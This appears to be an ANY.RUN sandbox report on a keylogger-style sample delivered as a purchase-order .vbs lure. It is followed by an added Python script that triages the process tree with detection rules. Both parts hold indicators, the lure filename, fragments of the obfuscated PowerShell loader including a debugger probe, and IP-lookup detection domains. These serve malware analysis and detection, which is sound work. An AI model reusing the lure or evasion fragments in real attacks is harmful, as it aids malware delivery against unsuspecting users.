No data
Executable files
0
Suspicious files
9
Text files
5
Unknown types
0

Dropped files

PID: 6044
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2umk2yhe.kvt.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5220
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 2B561B5E78E4067B167039075E57DCC2
SHA256: 7775AE8C83A7A2DA7CEFF9683D52313D85C7B78E30544CFEE5512BDE926684C7

PID: 6504
Process: msiexec.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
Type: binary
MD5: E935BC5762068CAF3E24A2683B1B8A88
SHA256: A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D

PID: 5220
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_r4ywpliz.lnp.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6504
Process: msiexec.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Type: binary
MD5: 846E55A191AEFBDA65C3F410957BD74C
SHA256: 749A131EE0A0A1762F8630BC3AE0E9BC58D3475B3E3975A8CA05B6CACF592AFD

PID: 6504
Process: msiexec.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Type: binary
MD5: E32F6262A6E9E771AC71D0A0DB5152EC
SHA256: B4293FB2DAA9BC3AEE08B996E8C34C89F5CD6217A08C5410DCA45EEDA59F278C

PID: 5220
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\romtoddyens.Sde
Type: text
MD5: 24B5B005BD540BF757D1F62B761D27CC
SHA256: 23787D329359824098BA0737C98988A666C77222B4E53F843538318C4BFE5585

PID: 6504
Process: msiexec.exe
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7
Type: binary
MD5: 711ED3CDDFA780D4011763AA882D6BB1
SHA256: EC3A28A8AB7323BFD0E1F2D05FB393280A44B0AE63C98AE763AC032A7375F86A

PID: 6044
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ita0ag1e.acp.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 5220
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s5kfhpjy.oa2.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
58
DNS requests
27
Threats
19

HTTP requests

PID | Process | Method | HTTP code | IP | URL | CN | Reputation
(PID and process appear only where the report attributes the request.)
GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
1880 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
2444 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | whitelisted
GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
GET | 200 | 142.250.185.99:80 | http://c.pki.goog/r/r1.crl | unknown | whitelisted
GET | 200 | 216.58.212.131:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | unknown | whitelisted
GET | 200 | 216.58.212.131:80 | http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
(PID and process appear only where the report attributes the connection.)
192.168.100.255:137 | whitelisted
5488 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
92.123.104.35:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
6944 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
5220 | powershell.exe | 142.250.186.174:443 | drive.google.com | GOOGLE | US | shared

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.46
whitelisted
www.bing.com
  • 92.123.104.35
  • 92.123.104.46
  • 92.123.104.33
  • 92.123.104.37
  • 92.123.104.40
  • 92.123.104.34
  • 92.123.104.36
  • 92.123.104.43
  • 92.123.104.32
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
drive.google.com
  • 142.250.186.174
shared
login.live.com
  • 20.190.160.22
  • 40.126.32.138
  • 40.126.32.140
  • 40.126.32.68
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.17
  • 40.126.32.134
whitelisted
drive.usercontent.google.com
  • 172.217.18.1
whitelisted
th.bing.com
  • 92.123.104.46
  • 92.123.104.31
  • 92.123.104.34
  • 92.123.104.38
  • 92.123.104.32
  • 92.123.104.33
  • 92.123.104.35
  • 92.123.104.36
  • 92.123.104.47
whitelisted
go.microsoft.com
  • 23.52.121.103
whitelisted

Threats

Class | Message
(The report attributes no PID or process to these alerts.)
Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Query (checkip .dyndns .org)
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity | ET INFO External IP Lookup Service Domain (reallyfreegeoip .org) in TLS SNI
Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)
Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Misc activity | ET INFO External IP Address Lookup Domain in DNS Lookup (reallyfreegeoip .org)
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
Device Retrieving External IP Address Detected | ET POLICY External IP Lookup - checkip.dyndns.org
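The process tree in this report (wscript.exe 6692 under explorer.exe, powershell.exe 5220 under wscript.exe with a roughly 6 KB command line, msiexec.exe 6504 under powershell.exe with no installer argument, plus the analyst's manual re-run as powershell.exe 6044 under explorer.exe) together with the external-IP-lookup alerts above is enough for a first triage pass. The Python below is an added example, not part of the ANY.RUN report: the events are constructed from the PIDs, image names, parents, command lines and domains shown on this page (the obfuscated command line is stood in for by its real prefix padded with one of its own fragments), and every rule, the `$host.DebuggerEnabled` marker and the 1000-character threshold are this example's assumptions, not ANY.RUN or ET signatures. It shows why a parent-based rule alone misses the manual re-run (6044) and why a content marker catches both PowerShell instances.

```python
"""Triage pass over the process tree and network artefacts of this report.
Added example, not part of the ANY.RUN report: the events are constructed
from the PIDs, images, parents and domains shown above, and every rule and
threshold is this example's own assumption, not an ANY.RUN or ET signature."""
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
IP_CHECK_DOMAINS = {"checkip.dyndns.org", "reallyfreegeoip.org"}  # from the Threats table
ANTI_ANALYSIS_MARKERS = ("$host.DebuggerEnabled",)  # host fingerprint used by this sample
LONG_CMDLINE = 1000  # assumption: no interactive user types this much into one command

R_SCRIPT_PS = "script host spawned PowerShell with a long command line"
R_ANTI = "PowerShell command line probes the host for a debugger"
R_MSIEXEC = "msiexec.exe started by PowerShell without an installer argument"
R_IPCHECK = "external IP lookup via {domain}"


@dataclass
class Proc:
    pid: int
    image: str      # base name, lower-case
    cmdline: str
    parent: str     # parent base name, lower-case


@dataclass
class Flow:
    pid: Optional[int]  # None when the sensor could not attribute the flow
    domain: str


def triage(procs: List[Proc], flows: List[Flow]) -> List[Tuple[Optional[int], str]]:
    """Return (pid, rule) hits; a process can hit more than one rule."""
    hits = []
    for p in procs:
        argv = shlex.split(p.cmdline, posix=False)  # keeps Windows quoting and backslashes intact
        if p.image in SHELLS and p.parent in SCRIPT_HOSTS and len(p.cmdline) >= LONG_CMDLINE:
            hits.append((p.pid, R_SCRIPT_PS))
        if p.image in SHELLS and any(m in p.cmdline for m in ANTI_ANALYSIS_MARKERS):
            hits.append((p.pid, R_ANTI))
        if p.image == "msiexec.exe" and p.parent in SHELLS and len(argv) == 1:
            hits.append((p.pid, R_MSIEXEC))
    for f in flows:
        if f.domain.lower() in IP_CHECK_DOMAINS:
            hits.append((f.pid, R_IPCHECK.format(domain=f.domain)))
    return hits


# Constructed stand-in for the ~6 KB obfuscated command line: its real prefix
# padded with one of its own fragments so the length check is meaningful.
PS_PREFIX = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" " '
PS_BODY = ("<#Kainsi Extendible Prestigiation #>; function Lerholdighedens($Rkeenglerne)"
           "{If ($host.DebuggerEnabled) {$Supercandidness++;}")
PS_CMDLINE = PS_PREFIX + PS_BODY + "$Treaarsdages='Raylessness62';" * 40 + '"'

PROCS = [
    Proc(6692, "wscript.exe",
         '"C:\\WINDOWS\\System32\\WScript.exe" "C:\\Users\\admin\\AppData\\Local\\Temp\\'
         'CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs"',
         "explorer.exe"),
    Proc(5220, "powershell.exe", PS_CMDLINE, "wscript.exe"),
    Proc(6044, "powershell.exe", PS_CMDLINE.replace("System32", "SysWOW64", 1), "explorer.exe"),  # manual re-run
    Proc(1576, "conhost.exe", "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1", "powershell.exe"),
    Proc(6504, "msiexec.exe", '"C:\\WINDOWS\\SysWOW64\\msiexec.exe"', "powershell.exe"),
]
FLOWS = [
    Flow(5220, "drive.google.com"),
    Flow(6944, "settings-win.data.microsoft.com"),
    Flow(None, "checkip.dyndns.org"),    # the Threats table lists these without a PID
    Flow(None, "reallyfreegeoip.org"),
]

if __name__ == "__main__":
    for pid, rule in triage(PROCS, FLOWS):
        print(f"{str(pid):>5}  {rule}")
```

The parent-based rule fires only for 5220; 6044 has explorer.exe as its parent because the analyst launched it by hand, and only the content marker flags it. The msiexec.exe rule keys on the bare command line the report shows for 6504, which no legitimate installer run produces; the CryptnetUrlCache writes and OCSP/CRL requests attributed to that PID are what a freshly injected payload doing certificate checks looks like, but the report does not show the injection itself, so the rule stays at "started without an argument".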
No debug info